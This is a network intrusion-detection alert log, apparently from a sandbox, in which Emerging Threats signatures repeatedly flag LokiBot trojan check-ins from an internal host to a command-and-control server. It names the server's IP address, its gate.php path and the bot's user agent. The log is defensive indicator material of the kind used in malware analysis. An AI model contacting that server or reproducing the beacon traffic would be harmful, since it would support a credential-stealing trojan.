                12/21/20-08:34:05.631100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.22185.193.143.118
                12/21/20-08:34:05.631100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.22185.193.143.118
                12/21/20-08:34:05.631100TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.22185.193.143.118
                12/21/20-08:34:05.631100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.22185.193.143.118
                12/21/20-08:34:05.631100TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923280192.168.2.22185.193.143.118
                12/21/20-08:34:05.812973TCP2025483ET TROJAN LokiBot Fake 404 Response8049232185.193.143.118192.168.2.22
                12/21/20-08:34:06.072213TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923380192.168.2.22185.193.143.118
                12/21/20-08:34:06.072213TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923380192.168.2.22185.193.143.118
                12/21/20-08:34:06.072213TCP2025381ET TROJAN LokiBot Checkin4923380192.168.2.22185.193.143.118
                12/21/20-08:34:06.072213TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923380192.168.2.22185.193.143.118
                12/21/20-08:34:06.072213TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923380192.168.2.22185.193.143.118
                12/21/20-08:34:06.257531TCP2025483ET TROJAN LokiBot Fake 404 Response8049233185.193.143.118192.168.2.22
                12/21/20-08:34:06.518842TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.22185.193.143.118
                12/21/20-08:34:06.518842TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.22185.193.143.118
                12/21/20-08:34:06.518842TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.22185.193.143.118
                12/21/20-08:34:06.518842TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.22185.193.143.118
                12/21/20-08:34:06.518842TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923480192.168.2.22185.193.143.118
                12/21/20-08:34:06.707419TCP2025483ET TROJAN LokiBot Fake 404 Response8049234185.193.143.118192.168.2.22
                12/21/20-08:34:06.975399TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.22185.193.143.118
                12/21/20-08:34:06.975399TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.22185.193.143.118
                12/21/20-08:34:06.975399TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.22185.193.143.118
                12/21/20-08:34:06.975399TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.22185.193.143.118
                12/21/20-08:34:06.975399TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923580192.168.2.22185.193.143.118
                12/21/20-08:34:07.170943TCP2025483ET TROJAN LokiBot Fake 404 Response8049235185.193.143.118192.168.2.22
                12/21/20-08:34:07.433149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.22185.193.143.118
                12/21/20-08:34:07.433149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.22185.193.143.118
                12/21/20-08:34:07.433149TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.22185.193.143.118
                12/21/20-08:34:07.433149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.22185.193.143.118
                12/21/20-08:34:07.433149TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923680192.168.2.22185.193.143.118
                12/21/20-08:34:07.616414TCP2025483ET TROJAN LokiBot Fake 404 Response8049236185.193.143.118192.168.2.22
                12/21/20-08:34:07.882491TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.22185.193.143.118
                12/21/20-08:34:07.882491TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.22185.193.143.118
                12/21/20-08:34:07.882491TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.22185.193.143.118
                12/21/20-08:34:07.882491TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.22185.193.143.118
                12/21/20-08:34:07.882491TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923780192.168.2.22185.193.143.118
                12/21/20-08:34:08.079046TCP2025483ET TROJAN LokiBot Fake 404 Response8049237185.193.143.118192.168.2.22
                12/21/20-08:34:08.329481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.22185.193.143.118
                12/21/20-08:34:08.329481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.22185.193.143.118
                12/21/20-08:34:08.329481TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.22185.193.143.118
                12/21/20-08:34:08.329481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.22185.193.143.118
                12/21/20-08:34:08.329481TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923880192.168.2.22185.193.143.118
                12/21/20-08:34:08.518978TCP2025483ET TROJAN LokiBot Fake 404 Response8049238185.193.143.118192.168.2.22
                12/21/20-08:34:08.775653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.22185.193.143.118
                12/21/20-08:34:08.775653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923980192.168.2.22185.193.143.118
                12/21/20-08:34:08.775653TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.22185.193.143.118
                12/21/20-08:34:08.775653TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.22185.193.143.118
                12/21/20-08:34:08.775653TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4923980192.168.2.22185.193.143.118
                12/21/20-08:34:08.962409TCP2025483ET TROJAN LokiBot Fake 404 Response8049239185.193.143.118192.168.2.22
                12/21/20-08:34:09.232918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.22185.193.143.118
                12/21/20-08:34:09.232918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.22185.193.143.118
                12/21/20-08:34:09.232918TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.22185.193.143.118
                12/21/20-08:34:09.232918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.22185.193.143.118
                12/21/20-08:34:09.232918TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924080192.168.2.22185.193.143.118
                12/21/20-08:34:09.421864TCP2025483ET TROJAN LokiBot Fake 404 Response8049240185.193.143.118192.168.2.22
                12/21/20-08:34:09.685127TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.22185.193.143.118
                12/21/20-08:34:09.685127TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.22185.193.143.118
                12/21/20-08:34:09.685127TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.22185.193.143.118
                12/21/20-08:34:09.685127TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.22185.193.143.118
                12/21/20-08:34:09.685127TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924180192.168.2.22185.193.143.118
                12/21/20-08:34:09.882205TCP2025483ET TROJAN LokiBot Fake 404 Response8049241185.193.143.118192.168.2.22
                12/21/20-08:34:10.151639TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.22185.193.143.118
                12/21/20-08:34:10.151639TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.22185.193.143.118
                12/21/20-08:34:10.151639TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.22185.193.143.118
                12/21/20-08:34:10.151639TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.22185.193.143.118
                12/21/20-08:34:10.151639TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924280192.168.2.22185.193.143.118
                12/21/20-08:34:10.347271TCP2025483ET TROJAN LokiBot Fake 404 Response8049242185.193.143.118192.168.2.22
                12/21/20-08:34:10.607949TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.22185.193.143.118
                12/21/20-08:34:10.607949TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.22185.193.143.118
                12/21/20-08:34:10.607949TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.22185.193.143.118
                12/21/20-08:34:10.607949TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.22185.193.143.118
                12/21/20-08:34:10.607949TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924380192.168.2.22185.193.143.118
                12/21/20-08:34:10.794916TCP2025483ET TROJAN LokiBot Fake 404 Response8049243185.193.143.118192.168.2.22
                12/21/20-08:34:11.045497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.22185.193.143.118
                12/21/20-08:34:11.045497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.22185.193.143.118
                12/21/20-08:34:11.045497TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.22185.193.143.118
                12/21/20-08:34:11.045497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.22185.193.143.118
                12/21/20-08:34:11.045497TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924480192.168.2.22185.193.143.118
                12/21/20-08:34:11.244723TCP2025483ET TROJAN LokiBot Fake 404 Response8049244185.193.143.118192.168.2.22
                12/21/20-08:34:11.501199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.22185.193.143.118
                12/21/20-08:34:11.501199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.22185.193.143.118
                12/21/20-08:34:11.501199TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.22185.193.143.118
                12/21/20-08:34:11.501199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.22185.193.143.118
                12/21/20-08:34:11.501199TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924580192.168.2.22185.193.143.118
                12/21/20-08:34:11.678664TCP2025483ET TROJAN LokiBot Fake 404 Response8049245185.193.143.118192.168.2.22
                12/21/20-08:34:11.935916TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.22185.193.143.118
                12/21/20-08:34:11.935916TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.22185.193.143.118
                12/21/20-08:34:11.935916TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.22185.193.143.118
                12/21/20-08:34:11.935916TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.22185.193.143.118
                12/21/20-08:34:11.935916TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924680192.168.2.22185.193.143.118
                12/21/20-08:34:12.130193TCP2025483ET TROJAN LokiBot Fake 404 Response8049246185.193.143.118192.168.2.22
                12/21/20-08:34:12.410321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.22185.193.143.118
                12/21/20-08:34:12.410321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.22185.193.143.118
                12/21/20-08:34:12.410321TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.22185.193.143.118
                12/21/20-08:34:12.410321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.22185.193.143.118
                12/21/20-08:34:12.410321TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924780192.168.2.22185.193.143.118
                12/21/20-08:34:12.596600TCP2025483ET TROJAN LokiBot Fake 404 Response8049247185.193.143.118192.168.2.22
                12/21/20-08:34:12.859761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924880192.168.2.22185.193.143.118
                12/21/20-08:34:12.859761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924880192.168.2.22185.193.143.118
                12/21/20-08:34:12.859761TCP2025381ET TROJAN LokiBot Checkin4924880192.168.2.22185.193.143.118
                12/21/20-08:34:12.859761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924880192.168.2.22185.193.143.118
                12/21/20-08:34:12.859761TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924880192.168.2.22185.193.143.118
                12/21/20-08:34:13.045886TCP2025483ET TROJAN LokiBot Fake 404 Response8049248185.193.143.118192.168.2.22
                12/21/20-08:34:15.289894TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924980192.168.2.22185.193.143.118
                12/21/20-08:34:15.289894TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924980192.168.2.22185.193.143.118
                12/21/20-08:34:15.289894TCP2025381ET TROJAN LokiBot Checkin4924980192.168.2.22185.193.143.118
                12/21/20-08:34:15.289894TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924980192.168.2.22185.193.143.118
                12/21/20-08:34:15.289894TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4924980192.168.2.22185.193.143.118
                12/21/20-08:34:15.471557TCP2025483ET TROJAN LokiBot Fake 404 Response8049249185.193.143.118192.168.2.22
                12/21/20-08:34:15.721700TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925080192.168.2.22185.193.143.118
                12/21/20-08:34:15.721700TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925080192.168.2.22185.193.143.118
                12/21/20-08:34:15.721700TCP2025381ET TROJAN LokiBot Checkin4925080192.168.2.22185.193.143.118
                12/21/20-08:34:15.721700TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925080192.168.2.22185.193.143.118
                12/21/20-08:34:15.721700TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925080192.168.2.22185.193.143.118
                12/21/20-08:34:15.909937TCP2025483ET TROJAN LokiBot Fake 404 Response8049250185.193.143.118192.168.2.22
                12/21/20-08:34:16.167681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925180192.168.2.22185.193.143.118
                12/21/20-08:34:16.167681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925180192.168.2.22185.193.143.118
                12/21/20-08:34:16.167681TCP2025381ET TROJAN LokiBot Checkin4925180192.168.2.22185.193.143.118
                12/21/20-08:34:16.167681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925180192.168.2.22185.193.143.118
                12/21/20-08:34:16.167681TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925180192.168.2.22185.193.143.118
                12/21/20-08:34:16.356204TCP2025483ET TROJAN LokiBot Fake 404 Response8049251185.193.143.118192.168.2.22
                12/21/20-08:34:16.612815TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925280192.168.2.22185.193.143.118
                12/21/20-08:34:16.612815TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925280192.168.2.22185.193.143.118
                12/21/20-08:34:16.612815TCP2025381ET TROJAN LokiBot Checkin4925280192.168.2.22185.193.143.118
                12/21/20-08:34:16.612815TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925280192.168.2.22185.193.143.118
                12/21/20-08:34:16.612815TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925280192.168.2.22185.193.143.118
                12/21/20-08:34:16.795536TCP2025483ET TROJAN LokiBot Fake 404 Response8049252185.193.143.118192.168.2.22
                12/21/20-08:34:17.056104TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925380192.168.2.22185.193.143.118
                12/21/20-08:34:17.056104TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925380192.168.2.22185.193.143.118
                12/21/20-08:34:17.056104TCP2025381ET TROJAN LokiBot Checkin4925380192.168.2.22185.193.143.118
                12/21/20-08:34:17.056104TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925380192.168.2.22185.193.143.118
                12/21/20-08:34:17.056104TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925380192.168.2.22185.193.143.118
                12/21/20-08:34:17.290444TCP2025483ET TROJAN LokiBot Fake 404 Response8049253185.193.143.118192.168.2.22
                12/21/20-08:34:17.553276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925480192.168.2.22185.193.143.118
                12/21/20-08:34:17.553276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925480192.168.2.22185.193.143.118
                12/21/20-08:34:17.553276TCP2025381ET TROJAN LokiBot Checkin4925480192.168.2.22185.193.143.118
                12/21/20-08:34:17.553276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925480192.168.2.22185.193.143.118
                12/21/20-08:34:17.553276TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925480192.168.2.22185.193.143.118
                12/21/20-08:34:17.746177TCP2025483ET TROJAN LokiBot Fake 404 Response8049254185.193.143.118192.168.2.22
                12/21/20-08:34:18.009481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925580192.168.2.22185.193.143.118
                12/21/20-08:34:18.009481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925580192.168.2.22185.193.143.118
                12/21/20-08:34:18.009481TCP2025381ET TROJAN LokiBot Checkin4925580192.168.2.22185.193.143.118
                12/21/20-08:34:18.009481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925580192.168.2.22185.193.143.118
                12/21/20-08:34:18.009481TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925580192.168.2.22185.193.143.118
                12/21/20-08:34:18.197959TCP2025483ET TROJAN LokiBot Fake 404 Response8049255185.193.143.118192.168.2.22
                12/21/20-08:34:18.454351TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925680192.168.2.22185.193.143.118
                12/21/20-08:34:18.454351TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925680192.168.2.22185.193.143.118
                12/21/20-08:34:18.454351TCP2025381ET TROJAN LokiBot Checkin4925680192.168.2.22185.193.143.118
                12/21/20-08:34:18.454351TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925680192.168.2.22185.193.143.118
                12/21/20-08:34:18.454351TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925680192.168.2.22185.193.143.118
                12/21/20-08:34:18.645733TCP2025483ET TROJAN LokiBot Fake 404 Response8049256185.193.143.118192.168.2.22
                12/21/20-08:34:18.916195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925780192.168.2.22185.193.143.118
                12/21/20-08:34:18.916195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925780192.168.2.22185.193.143.118
                12/21/20-08:34:18.916195TCP2025381ET TROJAN LokiBot Checkin4925780192.168.2.22185.193.143.118
                12/21/20-08:34:18.916195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925780192.168.2.22185.193.143.118
                12/21/20-08:34:18.916195TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925780192.168.2.22185.193.143.118
                12/21/20-08:34:19.103234TCP2025483ET TROJAN LokiBot Fake 404 Response8049257185.193.143.118192.168.2.22
                12/21/20-08:34:19.360780TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925880192.168.2.22185.193.143.118
                12/21/20-08:34:19.360780TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925880192.168.2.22185.193.143.118
                12/21/20-08:34:19.360780TCP2025381ET TROJAN LokiBot Checkin4925880192.168.2.22185.193.143.118
                12/21/20-08:34:19.360780TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925880192.168.2.22185.193.143.118
                12/21/20-08:34:19.360780TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925880192.168.2.22185.193.143.118
                12/21/20-08:34:19.537757TCP2025483ET TROJAN LokiBot Fake 404 Response8049258185.193.143.118192.168.2.22
                12/21/20-08:34:19.810534TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925980192.168.2.22185.193.143.118
                12/21/20-08:34:19.810534TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925980192.168.2.22185.193.143.118
                12/21/20-08:34:19.810534TCP2025381ET TROJAN LokiBot Checkin4925980192.168.2.22185.193.143.118
                12/21/20-08:34:19.810534TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925980192.168.2.22185.193.143.118
                12/21/20-08:34:19.810534TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4925980192.168.2.22185.193.143.118
                12/21/20-08:34:20.007169TCP2025483ET TROJAN LokiBot Fake 404 Response8049259185.193.143.118192.168.2.22
                12/21/20-08:34:20.265620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926080192.168.2.22185.193.143.118
                12/21/20-08:34:20.265620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926080192.168.2.22185.193.143.118
                12/21/20-08:34:20.265620TCP2025381ET TROJAN LokiBot Checkin4926080192.168.2.22185.193.143.118
                12/21/20-08:34:20.265620TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926080192.168.2.22185.193.143.118
                12/21/20-08:34:20.265620TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926080192.168.2.22185.193.143.118
                12/21/20-08:34:20.447707TCP2025483ET TROJAN LokiBot Fake 404 Response8049260185.193.143.118192.168.2.22
                12/21/20-08:34:20.716353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926180192.168.2.22185.193.143.118
                12/21/20-08:34:20.716353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926180192.168.2.22185.193.143.118
                12/21/20-08:34:20.716353TCP2025381ET TROJAN LokiBot Checkin4926180192.168.2.22185.193.143.118
                12/21/20-08:34:20.716353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926180192.168.2.22185.193.143.118
                12/21/20-08:34:20.716353TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926180192.168.2.22185.193.143.118
                12/21/20-08:34:20.916420TCP2025483ET TROJAN LokiBot Fake 404 Response8049261185.193.143.118192.168.2.22
                12/21/20-08:34:21.162199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926280192.168.2.22185.193.143.118
                12/21/20-08:34:21.162199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926280192.168.2.22185.193.143.118
                12/21/20-08:34:21.162199TCP2025381ET TROJAN LokiBot Checkin4926280192.168.2.22185.193.143.118
                12/21/20-08:34:21.162199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926280192.168.2.22185.193.143.118
                12/21/20-08:34:21.162199TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926280192.168.2.22185.193.143.118
                12/21/20-08:34:21.349723TCP2025483ET TROJAN LokiBot Fake 404 Response8049262185.193.143.118192.168.2.22
                12/21/20-08:34:21.617247TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926380192.168.2.22185.193.143.118
                12/21/20-08:34:21.617247TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926380192.168.2.22185.193.143.118
                12/21/20-08:34:21.617247TCP2025381ET TROJAN LokiBot Checkin4926380192.168.2.22185.193.143.118
                12/21/20-08:34:21.617247TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926380192.168.2.22185.193.143.118
                12/21/20-08:34:21.617247TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926380192.168.2.22185.193.143.118
                12/21/20-08:34:21.806761TCP2025483ET TROJAN LokiBot Fake 404 Response8049263185.193.143.118192.168.2.22
                12/21/20-08:34:22.049658TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926480192.168.2.22185.193.143.118
                12/21/20-08:34:22.049658TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926480192.168.2.22185.193.143.118
                12/21/20-08:34:22.049658TCP2025381ET TROJAN LokiBot Checkin4926480192.168.2.22185.193.143.118
                12/21/20-08:34:22.049658TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926480192.168.2.22185.193.143.118
                12/21/20-08:34:22.049658TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926480192.168.2.22185.193.143.118
                12/21/20-08:34:22.237977TCP2025483ET TROJAN LokiBot Fake 404 Response8049264185.193.143.118192.168.2.22
                12/21/20-08:34:22.498814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926580192.168.2.22185.193.143.118
                12/21/20-08:34:22.498814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926580192.168.2.22185.193.143.118
                12/21/20-08:34:22.498814TCP2025381ET TROJAN LokiBot Checkin4926580192.168.2.22185.193.143.118
                12/21/20-08:34:22.498814TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926580192.168.2.22185.193.143.118
                12/21/20-08:34:22.498814TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926580192.168.2.22185.193.143.118
                12/21/20-08:34:22.684316TCP2025483ET TROJAN LokiBot Fake 404 Response8049265185.193.143.118192.168.2.22
                12/21/20-08:34:22.936532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926680192.168.2.22185.193.143.118
                12/21/20-08:34:22.936532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926680192.168.2.22185.193.143.118
                12/21/20-08:34:22.936532TCP2025381ET TROJAN LokiBot Checkin4926680192.168.2.22185.193.143.118
                12/21/20-08:34:22.936532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926680192.168.2.22185.193.143.118
                12/21/20-08:34:22.936532TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926680192.168.2.22185.193.143.118
                12/21/20-08:34:23.116629TCP2025483ET TROJAN LokiBot Fake 404 Response8049266185.193.143.118192.168.2.22
                12/21/20-08:34:23.377784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926780192.168.2.22185.193.143.118
                12/21/20-08:34:23.377784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926780192.168.2.22185.193.143.118
                12/21/20-08:34:23.377784TCP2025381ET TROJAN LokiBot Checkin4926780192.168.2.22185.193.143.118
                12/21/20-08:34:23.377784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926780192.168.2.22185.193.143.118
                12/21/20-08:34:23.377784TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926780192.168.2.22185.193.143.118
                12/21/20-08:34:23.570331TCP2025483ET TROJAN LokiBot Fake 404 Response8049267185.193.143.118192.168.2.22
                12/21/20-08:34:23.832815TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926880192.168.2.22185.193.143.118
                12/21/20-08:34:23.832815TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926880192.168.2.22185.193.143.118
                12/21/20-08:34:23.832815TCP2025381ET TROJAN LokiBot Checkin4926880192.168.2.22185.193.143.118
                12/21/20-08:34:23.832815TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926880192.168.2.22185.193.143.118
                12/21/20-08:34:23.832815TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926880192.168.2.22185.193.143.118
                12/21/20-08:34:24.179902TCP2025483ET TROJAN LokiBot Fake 404 Response8049268185.193.143.118192.168.2.22
                12/21/20-08:34:24.436787TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926980192.168.2.22185.193.143.118
                12/21/20-08:34:24.436787TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926980192.168.2.22185.193.143.118
                12/21/20-08:34:24.436787TCP2025381ET TROJAN LokiBot Checkin4926980192.168.2.22185.193.143.118
                12/21/20-08:34:24.436787TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926980192.168.2.22185.193.143.118
                12/21/20-08:34:24.436787TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4926980192.168.2.22185.193.143.118
                12/21/20-08:34:24.625038TCP2025483ET TROJAN LokiBot Fake 404 Response8049269185.193.143.118192.168.2.22
                12/21/20-08:34:24.899040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927080192.168.2.22185.193.143.118
                12/21/20-08:34:24.899040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927080192.168.2.22185.193.143.118
                12/21/20-08:34:24.899040TCP2025381ET TROJAN LokiBot Checkin4927080192.168.2.22185.193.143.118
                12/21/20-08:34:24.899040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927080192.168.2.22185.193.143.118
                12/21/20-08:34:24.899040TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927080192.168.2.22185.193.143.118
                12/21/20-08:34:25.087898TCP2025483ET TROJAN LokiBot Fake 404 Response8049270185.193.143.118192.168.2.22
                12/21/20-08:34:25.357432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927180192.168.2.22185.193.143.118
                12/21/20-08:34:25.357432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927180192.168.2.22185.193.143.118
                12/21/20-08:34:25.357432TCP2025381ET TROJAN LokiBot Checkin4927180192.168.2.22185.193.143.118
                12/21/20-08:34:25.357432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927180192.168.2.22185.193.143.118
                12/21/20-08:34:25.357432TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4927180192.168.2.22185.193.143.118
                12/21/20-08:34:25.545368TCP2025483ET TROJAN LokiBot Fake 404 Response8049271185.193.143.118192.168.2.22
                12/21/20-08:34:25.805295TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927280192.168.2.22185.193.143.118
